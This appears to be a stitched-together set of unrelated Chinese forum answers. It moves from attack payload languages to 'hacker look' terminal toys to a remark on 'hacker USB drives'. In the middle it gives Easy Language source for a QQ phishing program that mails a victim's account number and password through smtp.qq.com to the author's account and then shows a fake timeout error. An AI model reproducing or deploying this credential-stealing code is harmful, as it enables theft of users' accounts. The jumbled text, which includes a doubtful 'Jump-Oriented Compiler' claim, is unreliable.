一般不會只使用一種語言的，取決于具體的攻擊場景。 比如說需要攻擊某個漏洞的時候，一般需要把一段惡意代碼送到目標機器里。這段惡意代碼行話叫“payload”，一般只能根據漏洞成因選擇特定的編程語言：

XSS / CSRF 漏洞一般只能用 JavaScript。SQL注入一般只能構造畸形SQL語句，命令執行類的會摻一點bash、DOS命令。反序列化漏洞一般用JSON、XML等，取決于具體的數據交換語言。溢出漏洞一般用匯編、C編寫shellcode，而且一般需要用到專門的 Jump-Oriented Compiler。拿Web Shell的時候，需要根據當前Web服務器配置選擇相應的ASP、PHP、ASPX等語言。另外，將payload送入目標機器一般需要構造特殊的提交方式： 如果需要構造畸形HTTP請求的話，我一般選擇Python，requests庫真的很好用。如果需要在套接字層直接提交TCP/UDP數據的話，我一般選擇C，也會考慮Python。剩下的情形對語言一般就沒有強制要求了，我平時大概隨心情在 Go 和 Python 之間選一個。

我給大家介紹一下如何用一些老式、比較復古的且實用的小工具來讓我們瞬間成為黑客的。

雖然目前有很多漂亮的 GUI，比如 Hacker Typer：

Hacker Typer

或者 GEEKtyper.com 的網頁版本：

GEEKtyper.com

上述兩個小工具，每個人都可以打開網頁，進行操作。

但是如果你想要看起來更老派，更專業，可以考慮使用 Cool Retro Term：

Swordfish90/cool-retro-term

它是一個終端模擬器，模仿陰極管屏幕的外觀和感覺，可以看下面的圖片。相比于其他終端模擬器，它被設計的更加美觀、可自定義且占用很小的存儲空間。

我用易語言寫的一個QQ盜號源碼，其中你的QQ號和小號的QQ號和密碼都需要改一下。代碼如下（第一個編輯框內容為帳號，第二個為密碼）：.版本 2.支持庫 internet.子程序 __啟動窗口_創建完畢連接發信服務器 (“smtp.qq.com”, , “你小號QQ號”, “你小號QQ號密碼”, ).子程序 _按鈕1_被單擊發送郵件 (“QQ釣魚程序”, “帳號：” ＋ 編輯框1.內容 ＋ #換行符 ＋ “密碼：” ＋ 編輯框2.內容, “你小號的QQ號”, ,，“你大號的QQ號” )信息框 (“登陸超時，錯誤代碼：00000000x1”, 0, )

沒有所謂的黑客u盤，不是說他把bt五這樣的系統裝到u盤里面，然后啟動的時候選擇優盤啟動。

這樣就進入滲透系統了 你連這個優盤到底是什么一回事，你都不能夠理解，你就別玩什么黑客了